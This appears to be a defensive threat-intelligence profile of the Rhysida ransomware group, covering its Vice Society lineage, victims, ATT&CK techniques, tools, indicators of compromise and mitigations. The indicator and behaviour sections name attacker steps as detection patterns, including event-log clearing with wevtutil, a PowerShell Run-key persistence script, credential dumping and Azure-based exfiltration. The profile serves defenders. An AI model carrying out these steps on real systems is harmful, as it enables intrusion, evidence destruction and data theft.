rhysida

Rhysida

also known as: TAC5279 (Sophos) Vanilla Tempest (Microsoft) DEV-0832 (Microsoft — historical Vice Society designation)

Rhysida is a Ransomware-as-a-Service operation active since May 2023, assessed by Sophos, Check Point, and Microsoft to represent the operational successor to the Vice Society ransomware group. Rhysida is named after a genus of centipedes and targets organizations it describes as "targets of opportunity" across healthcare, education, government, and manufacturing — deploying double extortion and a distinctive dark web auction model for stolen data rather than a fixed ransom demand. The April 2025 CISA advisory update confirmed the group is still evolving its techniques as of December 2024.

attributed origin Russia / CIS (assessed — Russian internal communications; CIS country exclusion in code; time zone analysis)

assessed lineage Vice Society (DEV-0832) — same operator cluster tracked as TAC5279 by Sophos switched from Vice Society to Rhysida in June–July 2023

first observed May 2023 (publicly); later analysis suggests January 2023 earliest activity

primary motivation Financial — RaaS / double extortion with dark web data auctions

primary targets Healthcare, Education, Government, Manufacturing, IT, Defense contractors

notable victims British Library, Lurie Children's Hospital (791K affected), Port of Seattle ($5.8M demand), Insomniac Games, Prospect Medical Holdings, City of Columbus, Maryland MTA, Chilean Army

mitre att&ck group Unassigned (no formal G-number as of March 2026)

cisa advisory AA23-319A (November 2023; updated April 30, 2025)

confirmed victims (DLS) 268 (ransomware.live, March 2026); 259 confirmed per Ransom-DB (Jan 2026); avg. demand $1.1M; largest demand $5.8M (Port of Seattle)

threat level HIGH — active, evolving, healthcare focus intensifying

Overview

Rhysida first appeared in May 2023, though samples analyzed later place its earliest activity in January 2023. Within months of public emergence the group went from what researchers initially described as "novice malware" to a sophisticated double-extortion operation targeting critical infrastructure — a trajectory that, combined with significant TTP overlap with Vice Society, led Sophos, Check Point, and Microsoft to conclude that Rhysida represents Vice Society operators adopting a new platform rather than an entirely new criminal organization.

The Vice Society connection is well-evidenced. Sophos tracks the activity cluster as TAC5279, which it first observed using Vice Society ransomware in November 2022. The same cluster switched to deploying Rhysida in June 2023 — precisely when Vice Society's leak site went quiet after posting victims consistently since 2021. The timing of Vice Society's last victim post and Rhysida's first victim post in mid-2023 forms a near-seamless handoff. Shared tooling — particularly the use of SystemBC for C2, consistent PowerShell scripting patterns, and AnyDesk as the preferred RMM tool — reinforces that these are the same operators with a new payload. CISA's advisory explicitly notes the similarity and cross-references the Vice Society advisory.

Rhysida takes its name from the Rhysida genus of centipedes — an apparent reference to stealth and operating in shadows. The group brands itself as a "cybersecurity team" in ransom communications, framing attacks as penetration tests and advising victims to "reach out as soon as possible to stop the leakage of your confidential information to the public." This theatrical framing is consistent with Vice Society's prior communications style.

One technically significant event in Rhysida's history is the February 2024 publication of a decryptor tool by South Korean researchers from Kookmin University and KISA. They discovered a vulnerability in Rhysida's ChaCha20-based CSPRNG implementation — the encryption key seed was derived from system time using the C standard library's rand() function, making keys predictable and recoverable. Avast had independently discovered the flaw in August 2023 and privately provided decryption to victims for months. KISA released the tool publicly in February 2024, likely prompting Rhysida to patch the cryptographic vulnerability in subsequent builds. The group's continued activity after the decryptor's publication confirms an updated payload was deployed.

The April 30, 2025 CISA advisory update added new IOCs from investigations as recently as December 2024 and introduced documentation of new initial access vectors including Gootloader delivery and AZCopy/StorageExplorer for cloud data exfiltration — confirming ongoing operational evolution. The update also flagged similarities between Rhysida and the emerging Interlock ransomware variant. Notably, CISA's own joint advisory on Interlock ransomware (AA25-203A, July 2025) explicitly cross-references the Rhysida advisory and states that authoring agencies are aware of open-source reporting detailing code and technique similarities between the two variants — placing the Rhysida/Interlock relationship on official record rather than as researcher speculation alone.

Target Profile

CISA describes Rhysida as targeting "victims of opportunity" — organizations that present accessible attack surfaces rather than highly specific sector mandates. That said, the victim portfolio shows consistent preference for sectors with high-value sensitive data and regulatory pressure to restore operations quickly.

Healthcare: A primary growth sector for Rhysida, inherited from Vice Society's playbook. Prospect Medical Holdings — a California-based conglomerate operating 17 hospitals and 166 clinics across multiple states — was hit in 2023, with 1.3 TB of SQL databases and 1 TB of documents exfiltrated. In 2024, at least 68 healthcare organizations were targeted using Cobalt Strike in the attack chain. Healthcare victims face life-safety pressure to restore systems quickly, regulatory exposure under HIPAA, and hold high-value patient data — all factors that maximize payment pressure.
Education: A Vice Society specialty inherited by Rhysida. Universities, school districts, and K-12 systems are consistently targeted. These organizations hold sensitive student and staff data, often run complex distributed networks with limited security budgets, and face significant public accountability pressure. The Vice Society playbook of targeting education — which accounted for 38.4% of Vice Society's attacks — is reflected in Rhysida's continued focus on the sector.
Government and Public Sector: Municipal governments, transportation agencies, and public institutions appear regularly on Rhysida's leak site. The City of Columbus (Ohio), Maryland Transit Administration, Port of Seattle / Seattle-Tacoma International Airport, Oregon Department of Environmental Quality, and the Chilean Army are among confirmed government victims. The Port of Seattle attack generated Rhysida's largest ever ransom demand of $5.8 million; Rhysida's average demand across confirmed incidents is approximately $1.1 million. Public sector organizations face reputational pressure that heightens ransom leverage, and their data — including law enforcement records and emergency services access — commands high dark web auction values.
Manufacturing and IT: Consistent with CISA's advisory targeting profile. Supply chain-adjacent organizations and managed service providers are targeted both for direct extortion and for the downstream access their compromise can enable.
Cultural and Media institutions: The British Library and Insomniac Games attacks demonstrated Rhysida's willingness to target high-profile cultural and entertainment institutions. The reputational damage of a major cultural institution losing a decade of digital infrastructure — and a major game studio having unreleased Marvel IP dumped publicly — generates media coverage that amplifies the group's notoriety and future leverage.

Tactics, Techniques & Procedures

TTPs sourced from CISA advisory AA23-319A (updated April 30, 2025), Sophos incident response analysis (TAC5279 cluster), and field reporting. Rhysida operates as both a closed operation and a RaaS model with affiliates; individual affiliate TTPs vary but the core toolchain and extortion model are consistent.

mitre id	technique	description
T1133	External Remote Services	VPN access is the primary initial access vector. Rhysida actors leverage internet-facing VPN services — both via phishing-harvested credentials and by exploiting known CVEs (notably ZeroLogon CVE-2020-1472 against domain controllers). The British Library attack was initiated via a VPN vulnerability that allowed bypassing the perimeter firewall.
T1566	Phishing	Phishing emails used for both initial access and Cobalt Strike payload delivery. In 2025, Gootloader — delivered via SEO poisoning (malicious websites ranking for software download searches) — was added as an initial access vector, providing trojanized software installers that deploy backdoor access.
T1059.001	PowerShell	Extensive PowerShell use for discovery, credential harvesting support, defense evasion, and payload staging. Documented PowerShell scripts systematically disable and stop security-related services including SQL, Oracle, Exchange, Veeam backup, Hyper-V, Malwarebytes, and antivirus processes before encryption.
T1105	Ingress Tool Transfer	Malicious executables staged in created folders C:\in and C:\out on compromised systems — a documented Rhysida actor staging pattern. Tools transferred to compromised hosts include Cobalt Strike beacons, credential harvesting utilities, and the Rhysida encryptor binary.
T1003.001	OS Credential Dumping: LSASS Memory	Secretsdump used for credential harvesting. Combined with ntdsutil for NTDS.dit extraction and PowerShell-based enumeration tools. Credentials from domain controllers enable rapid lateral movement across the environment using legitimate administrator accounts.
T1021.001	Remote Services: RDP	RDP used throughout the lateral movement phase alongside AnyDesk and PuTTY for interactive access. SystemBC — the C2 tool carried over from Vice Society operations — provides persistent encrypted communication channels. Rhysida uses RDP to blend with legitimate admin activity during extended dwell periods averaging approximately 30 days before encryption.
T1070.001	Indicator Removal: Clear Windows Event Logs	wevtutil.exe used to clear System, Application, and Security event log categories post-access. Combined with Windows Defender exclusion additions for executable files and registry modifications — a documented evasion script pattern used by Rhysida affiliates to suppress security telemetry before and during encryption.
T1530	Data from Cloud Storage	A 2025 evolution documented in the updated CISA advisory: AZCopy (Azure CLI utility for blob storage transfers) and StorageExplorer-windows-x64.exe used to exfiltrate data to and from Azure storage accounts. This represents a shift toward cloud-native exfiltration channels that blend with legitimate enterprise cloud operations.
T1486	Data Encrypted for Impact	4096-bit RSA key pair generation per victim; ChaCha20 stream cipher for file encryption (via LibTomCrypt). Files appended with .rhysida extension. A cryptographic implementation vulnerability in early versions (ChaCha20-based CSPRNG seeded with system time via C rand()) enabled decryption without the key — discovered by multiple independent parties and publicly released as a free decryption tool by KISA in February 2024. Updated builds address this flaw.
T1657	Financial Theft — Extortion	Ransom note "CriticalBreachDetected.pdf" dropped as PDF in encrypted directories — PDF format noted by CISA as suggesting Rhysida targets systems compatible with PDF rendering. Victims provided a unique code and Tor .onion portal URL. Demands made in Bitcoin. Unique extortion model: stolen data listed on the Rhysida dark web site as an exclusive auction — "We sell only to one hand, no reselling" — with a deadline before public release if no buyer is found.

decryptor note

KISA published a free decryptor for Rhysida in February 2024. It exploits a vulnerability in the CSPRNG implementation of early Rhysida builds — encryption keys were derived from system time using C's rand() function, making them predictable. Avast had independently discovered the flaw in August 2023 and privately assisted victims. The decryptor applies only to earlier builds; Rhysida updated its cryptographic implementation following public disclosure. If your organization was compromised before mid-2024 and has not yet recovered encrypted files, consulting the KISA decryption tool is worth evaluating before paying. Post-mid-2024 builds are not known to be decryptable without the key.

Known Campaigns

Selected confirmed and high-profile attributed incidents. Rhysida typically operates with extended dwell periods — averaging approximately 30 days between initial access and encryption — giving well-monitored environments a detection window before the final payload stage.

British Library October–November 2023

Rhysida attacked the British Library — one of the world's largest and most prestigious research libraries, holding over 170 million items — in late October 2023. Initial access was gained via a VPN vulnerability allowing perimeter bypass. The attack encrypted files and exfiltrated approximately 600 GB of sensitive data including personal details of library staff and users. Rhysida demanded 20 Bitcoin (approximately $590,000 at the time). The Library refused to pay. In late November, Rhysida published 490,191 files totaling 573 GB on its dark web site. Recovery cost the library an estimated $7.5–$8.7 million USD and disrupted services for more than a year — the Library's core software systems could not be restored in their pre-attack form because the underlying platforms were no longer vendor-supported. This attack is documented as a case study in why legacy infrastructure creates compounding ransomware recovery risk.

Insomniac Games (Sony) December 2023

Rhysida compromised Insomniac Games — a Sony-owned video game studio — and exfiltrated 1.67 terabytes of data. When no buyer was found at auction, Rhysida published the full dataset publicly. The leak included employee passport scans, HR documents, screenshots of internal Slack conversations, non-disclosure agreements, contract details, and complete development materials for the unreleased Marvel's Wolverine game — including build details, character designs, and storyline content. The impact extended well beyond the studio: employees faced identity theft risk from exposed personal documents, and Sony's anticipated game release timeline was disrupted. The leak remains actively shared across gaming communities.

Prospect Medical Holdings August 2023

Rhysida attacked Prospect Medical Holdings, a California-based healthcare conglomerate operating 17 hospitals and 166 clinics across the United States, on approximately August 3, 2023. Employees discovered ransom notes on their screens stating the network had been hacked and devices encrypted. Rhysida exfiltrated 1.3 TB of SQL databases and 1 TB of documents — including corporate records, patient data, and Social Security Numbers for approximately 500,000 individuals. The group listed the data for sale at 50 Bitcoin (approximately $1.5 million). The attack disrupted operations across multiple states, forcing hospitals to divert ambulances and revert to paper systems, directly impacting patient care.

City of Columbus, Ohio July 2024

Rhysida attacked the City of Columbus on July 18, 2024, exfiltrating 6.5 TB of data from city servers. The city's IT team successfully stopped Rhysida from completing encryption of city data — but the exfiltrated data was already gone. Rhysida listed the data for 30 Bitcoin (approximately $1.9 million), including databases, employee credentials, emergency services application data, city camera access, payroll information, and personal messages. After the auction deadline passed without a buyer, Rhysida released the data publicly. At least 12 Columbus police officers had bank accounts compromised in the aftermath. The incident affected over 500,000 individuals and generated an unusual public dispute: Columbus initially claimed the leaked data was "corrupted or incomplete," a position challenged by security researchers who accessed and verified the leak contents, leading to legal proceedings over the researchers' right to publicly discuss the breach.

Slovenian Power Grid — HSE November 2023

Rhysida hit Holding Slovenske Elektarne (HSE), Slovenia's largest power generation company, on November 22, 2023. The attack targeted one of the European Union's critical energy infrastructure operators, claiming 1 TB of documents and 1.3 TB of databases. The attack demonstrated Rhysida's willingness to target energy sector critical infrastructure — not merely data-rich organizations — raising the potential for operational disruption beyond financial extortion.

Ann & Robert H. Lurie Children's Hospital of Chicago January 2024

Rhysida attacked Lurie Children's Hospital on January 31, 2024, forcing the hospital to take its phone, email, Epic EHR, and MyChart patient portal systems offline. Staff reverted to manual paper-based procedures for patient records. It took until May 20, 2024 — nearly four months — to restore access to the EHR. The forensic investigation confirmed unauthorized access from January 26 to 31, 2024. Rhysida demanded 60 Bitcoin (approximately $3.4 million), threatening to sell the exfiltrated data — which they subsequently claimed to have done when payment was not made. The breach ultimately affected 791,784 individuals, including patients and staff, with exposed data including names, addresses, Social Security numbers, medical records, health insurance details, and clinical information. Rhysida's $3.4 million demand matched its Maryland MTA demand and was its second-largest known ransom at that time, surpassed only by the Port of Seattle attack.

Port of Seattle / Seattle-Tacoma International Airport August 2024

Rhysida attacked the Port of Seattle on August 24, 2024 — the US government agency managing Seattle-Tacoma International Airport and Seattle's seaport and maritime operations. The attack took down baggage handling, check-in, reserved parking, and online systems for several weeks. The Port confirmed it was Rhysida ransomware and stated it had refused to pay the ransom. 90,000 individuals' records were ultimately breached. Rhysida's ransom demand of $5.8 million (equivalent) is the group's largest ever recorded demand. When the Port declined to pay, Rhysida published the exfiltrated data on its dark web leak site. The attack demonstrates Rhysida's capability and willingness to target US federal and port authority critical infrastructure — not only healthcare and education — and to sustain extended operational disruption at a major international airport.

Maryland Transit Administration 2025

Rhysida claimed responsibility for a cyberattack on the Maryland Transit Administration (MTA), part of the Maryland Department of Transportation. The breach exposed sensitive personal data — names, Social Security numbers, driver's licenses, and passports — of MTA personnel and contractors. Rhysida demanded 30 Bitcoin (approximately $3.4 million) to stop the stolen information from being released publicly. The attack was one of a series of 2025 incidents that confirmed Rhysida's continued activity against government transportation infrastructure.

Tools & Malware

Rhysida ransomware encryptor: 64-bit PE Windows application compiled with MINGW/GCC. Uses a 4096-bit RSA key pair generated per victim for key encapsulation; ChaCha20 stream cipher (via LibTomCrypt) for file encryption. Appends .rhysida extension to encrypted files. Drops "CriticalBreachDetected.pdf" ransom note in PDF format. Self-deletes after encryption to hinder forensic analysis. Compatible with pre-Windows 10 versions, expanding the potential victim base. Early builds contained a CSPRNG vulnerability enabling decryption without the key (patched following public disclosure in February 2024). Notably, early Rhysida samples — flagged by the HHS HC3 sector alert in August 2023 — lacked commodity ransomware features including VSS shadow copy deletion, multiple persistence mechanisms, and process termination unhooking. This absence of VSS deletion in early versions creates a potential recovery path for organisations compromised before the payload matured. Whether later builds added VSS deletion is not consistently confirmed across sources — forensic review is recommended before assuming VSS copies are unavailable.
SystemBC: Proxy/C2 tool carried over from Vice Society operations. Used for persistent encrypted C2 communication. Sophos documents SystemBC PowerShell scripts named svchost.ps1 establishing persistence via HKCU run keys — the same pattern observed in TAC5279's Vice Society-era operations, providing direct attribution evidence.
Cobalt Strike: Industry-standard penetration testing framework used post-access for C2, lateral movement staging, and payload delivery. Used alongside SystemBC in documented Rhysida campaigns.
CleanUpLoader: Custom loader used in some Rhysida campaigns for payload delivery and post-exploitation staging.
Gootloader (2025 addition): Malware-as-a-service delivery framework distributed through SEO poisoning — malicious websites ranking for software download search terms delivering trojanized installers. Added to Rhysida's initial access toolkit as documented in the April 2025 CISA advisory update.
AZCopy / StorageExplorer (2025): Microsoft Azure command-line and GUI tools abused for cloud-native data exfiltration to attacker-controlled Azure storage accounts. Documented in the April 2025 CISA advisory update as new exfiltration methods observed in Rhysida operations through December 2024.
AnyDesk / PuTTY / RDP: Legitimate remote access tools used for persistent access, lateral movement, and interactive operator presence throughout dwell periods. Inherited from Vice Society operational tradecraft.
Secretsdump / ntdsutil: Credential harvesting tools for LSASS memory dumping and NTDS.dit extraction from domain controllers, providing domain-wide credential access to enable unrestricted lateral movement.
wevtutil.exe: Native Windows event log management utility used to clear System, Application, and Security event logs post-access, removing forensic evidence of the intrusion before encryption begins.

Indicators of Compromise

IOCs sourced from CISA advisory AA23-319A (updated April 30, 2025). The updated advisory includes current email accounts, URLs, file paths, and network indicators from investigations through December 2024. The original November 2023 IOCs were partially removed in the April 2025 update as they were assessed outdated — use only the current advisory version.

warning

The April 2025 CISA advisory update explicitly removed outdated IOCs — use only the current version of AA23-319A available at cisa.gov. The full tables (Tables 4–6 for email, URL, and file path IOCs; Table 9 onward for MITRE ATT&CK mappings) contain the most current operational indicators from FBI investigations through December 2024.

indicators of compromise — Rhysida (structural and behavioral)

file ext .rhysida — appended to all encrypted files

ransom note CriticalBreachDetected.pdf — PDF ransom note dropped in encrypted directories; contains unique victim code and Tor .onion URL; plain-text content embedded in ransomware binary (enables string-based detection)

email (c2) rhysidaeverywhere@onionmail[.]org; rhysidaofficial@onionmail[.]org — victim communication accounts documented in CISA advisory

file path C:\in and C:\out — staging directories created on compromised systems for hosting malicious executables and exfiltration staging

behavior wevtutil.exe cl System / Application / Security — event log clearing pre-encryption; Windows Defender exclusion addition for .exe files; registry modifications to suppress security tooling

behavior SystemBC PowerShell script: svchost.ps1 — persistence via HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run (carried over from Vice Society TTPs; high-confidence attribution signal for TAC5279 cluster)

tool (2025) StorageExplorer-windows-x64.exe and AZCopy — Azure cloud exfiltration tools; alert on execution outside approved cloud management workflows, particularly with large outbound data transfers to Azure storage endpoints

full iocs Current IOC tables (email, URL, file paths, network indicators): CISA advisory AA23-319A updated April 30, 2025 — cisa.gov/news-events/cybersecurity-advisories/aa23-319a

Mitigation & Defense

Rhysida's primary initial access paths are VPN credential compromise and phishing. The 30-day average dwell period before encryption creates a genuine detection window for organizations with active monitoring — unlike faster-moving operators who encrypt within hours of access.

Enforce MFA on all VPN access: VPN credential exploitation — either via phishing-harvested credentials or CVE exploitation — is Rhysida's primary initial access vector. Phishing-resistant MFA (FIDO2/passkeys) on all VPN portals closes this path. TOTP-based MFA provides partial protection but remains vulnerable to real-time phishing. Any VPN portal without MFA in Rhysida's target sectors should be treated as an active risk requiring immediate remediation.
Deploy SEO poisoning awareness and software download controls: The 2025 addition of Gootloader to Rhysida's access toolkit means employees searching for legitimate software downloads may receive trojanized installers from malicious sites ranking in search results. Enforce approved software distribution through IT-managed channels and blocklist direct .exe downloads from unrecognized domains. User awareness training should include explicit coverage of software download risk.
Monitor for staging directory creation: Rhysida actors consistently create C:\in and C:\out directories on compromised systems for tool staging. Alert on the creation of these specific directories on any domain-joined system outside of approved change management. Broader alerts on new directory creation at the C:\ root level from non-administrative processes catch this class of behavior.
Hunt for SystemBC and svchost.ps1: The SystemBC PowerShell persistence script named svchost.ps1 establishing a HKCU run key is a documented TAC5279 tradecraft signature carried over from Vice Society. SIEM rules hunting for PowerShell scripts named svchost.ps1 in user context — or any new HKCU run key entry — can identify Rhysida presence during the dwell period, before encryption is triggered.
Alert on wevtutil event log clearing: wevtutil.exe invocations clearing System, Application, or Security logs are a documented Rhysida pre-encryption behavior. These should trigger immediate tier-1 escalation regardless of the security context. Legitimate administrative use of wevtutil for log clearing outside approved maintenance windows is rare.
Monitor AZCopy and StorageExplorer executions: The 2025 CISA advisory documents Rhysida's use of AZCopy and StorageExplorer for cloud-native exfiltration. Alert on execution of these tools on systems where they are not part of approved cloud management workflows, particularly when combined with large outbound network transfers to Azure blob storage endpoints.
Patch ZeroLogon and VPN appliance CVEs: CVE-2020-1472 (ZeroLogon) is a documented Rhysida initial access vector. Any domain controller still vulnerable to ZeroLogon represents a critical unmitigated risk. VPN appliance CVEs should be patched on a sub-72-hour timeline for critical vulnerabilities given their consistent use as ransomware entry points across Rhysida and peer groups.
Use the 30-day dwell window: Unlike groups that encrypt within hours of access, Rhysida's documented average dwell period of approximately 30 days between initial access and encryption provides a genuine detection opportunity. Organizations with 24/7 EDR monitoring and behavioral alerting — particularly for credential harvesting, lateral movement via RDP, and event log clearing — have a realistic chance of detecting and evicting Rhysida before the encryption phase begins. This window does not exist for faster-moving operators; it is a Rhysida-specific defensive advantage worth explicitly incorporating into incident response planning.

Sources & Further Reading

— end of profile — last updated 2026-03-26